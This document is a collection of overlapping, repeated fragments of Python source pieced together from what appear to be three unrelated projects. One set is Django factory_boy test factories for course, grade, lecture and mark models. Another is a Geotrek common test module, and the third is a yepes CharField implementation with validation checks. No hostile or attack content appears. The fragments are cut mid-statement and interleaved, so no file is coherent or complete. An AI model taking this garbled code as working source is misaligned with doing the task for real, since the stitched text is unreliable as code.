"= fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher",
"= models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course =",
"create, extracted, **kwargs): if not create: return if extracted: for teacher in extracted:",
"fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted:",
"sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class",
"n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile =",
"**kwargs): if not create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else:",
"mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student",
"courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as",
"in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory)",
"class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text')",
"head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester",
"@factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return if extracted: for",
"content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment",
"labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted,",
"random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model =",
"_: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at =",
"models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory)",
"datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name",
"course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date",
"users import models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES",
"ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today())",
"from tests.users import factories as users_factories from users import models as users_models PROFILE_CHOICES",
") class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def",
"= factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark",
"= models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date =",
") class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name =",
"return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5)",
"for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not",
"if not create: return if extracted: for student in extracted: self.students.add(student) else: random_students",
"datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation",
"name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor =",
"in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student)",
"class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self,",
"return if extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10)",
"class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16)",
"else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class",
"= random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model",
"class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory):",
"= factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory):",
"import random import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from",
"import factories as users_factories from users import models as users_models PROFILE_CHOICES = [x[0]",
"def students(self, create, extracted, **kwargs): if not create: return if extracted: for student",
"False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours",
"model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content",
"as users_factories from users import models as users_models PROFILE_CHOICES = [x[0] for x",
"fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if",
"in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1,",
"extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class",
"= 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student =",
"factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class",
"= models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _:",
"from users import models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES]",
"description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height':",
"factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate(",
"for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name",
"created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory)",
"import datetime import random import factory import factory.fuzzy as fuzzy from django.core.files.base import",
"= factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description",
"= factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600}",
"description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class",
"description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam",
"Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text')",
"= fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta:",
"factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade",
"in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def",
"extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher",
"fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100),",
"model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description =",
"class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today())",
"from django.core.files.base import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES",
"= factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at =",
"description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), )",
"model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course",
"= models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title =",
"fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model =",
"\"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory)",
"teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course =",
"CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" %",
"models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create:",
"factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark =",
"fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600,",
"Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text')",
"= factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory):",
"deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta:",
"title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta:",
"= models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object')",
"x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda",
"= factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester =",
"range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])",
"= fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i",
"random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta:",
"random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model =",
"+ datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16)",
"= factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model",
"lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at",
"600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today()) updated_at = fuzzy.FuzzyDate(datetime.date.today())",
"class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today())",
"factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100),",
"n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123'",
"group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today()",
"start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model =",
"%02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu",
"GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" %",
"+ datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory)",
"for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i",
"date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class",
"model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course",
"= factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model"
] |
[
"not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj =",
"-*- encoding: utf-8 -*- from django.utils import translation from django.utils.translation import ugettext as",
"encoding: utf-8 -*- from django.utils import translation from django.utils.translation import ugettext as _",
"NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest",
"def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code,",
"def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def",
"utf-8 -*- from django.utils import translation from django.utils.translation import ugettext as _ #",
"import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def",
"import translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models",
"geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory",
"self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure,",
"MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.')",
"self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(), self.get_good_data()) self.assertEqual(obj.structure, structure)",
"# -*- encoding: utf-8 -*- from django.utils import translation from django.utils.translation import ugettext",
"self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not",
"= '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self):",
"geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin,",
"# NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import",
"self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'):",
"# Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest",
"import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest):",
"ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from",
"<filename>geotrek/common/tests/__init__.py<gh_stars>0 # -*- encoding: utf-8 -*- from django.utils import translation from django.utils.translation import",
"valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data())",
"_(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response",
"Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from",
"obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login()",
"translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import",
"from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType",
"if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj =",
"mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object):",
"'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login()",
"test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj",
"geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin,",
"translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return",
"not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(),",
"super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology':",
"import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp()",
"from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate()",
"hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(),",
"not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure)",
"TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not",
"'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure,",
"from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class",
"_ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import",
"def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure)",
"hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last()",
"= self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure",
"FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests",
"get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model,",
"return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'):",
"class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology",
"https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories",
"class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix =",
"'/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if",
"test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302)",
"302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return",
"self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'},",
"self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def",
"MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self):",
"django.utils import translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from",
"import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA",
"CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is",
"-*- from django.utils import translation from django.utils.translation import ugettext as _ # Workaround",
"is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response =",
"from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest,",
"return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(), self.get_good_data()) self.assertEqual(obj.structure,",
"self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure =",
"return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure)",
"from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import",
"self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory()",
"import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from",
"{'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return",
"StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class",
"response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self):",
"self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model,",
"setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self):",
"AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix",
"django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType #",
"api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def",
"from django.utils import translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865",
"= self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if",
"def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not",
"'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(), self.get_good_data())",
"as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests",
"TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/'",
"if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj"
] |
[
"**kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self):",
"'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField,",
"'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces':",
"<= 0)): return [ checks.Error( \"'max_length' must be None or a positive integer.\",",
"'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description =",
"False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return",
"' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return value if",
"= kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if",
"greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else:",
"False, }) return (name, path, args, kwargs) def formfield(self, **kwargs): params = {",
"CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types)",
"'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length':",
"}) return (name, path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class':",
"def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or",
"'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args,",
"a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length",
"deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self,",
"from django.core.validators import MinLengthValidator from django.db import models from django.utils import six from",
"self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value",
"hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return",
"clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None,",
"'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces':",
"0)): return [ checks.Error( \"'max_length' must be None or a positive integer.\", hint=None,",
"django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from yepes import forms",
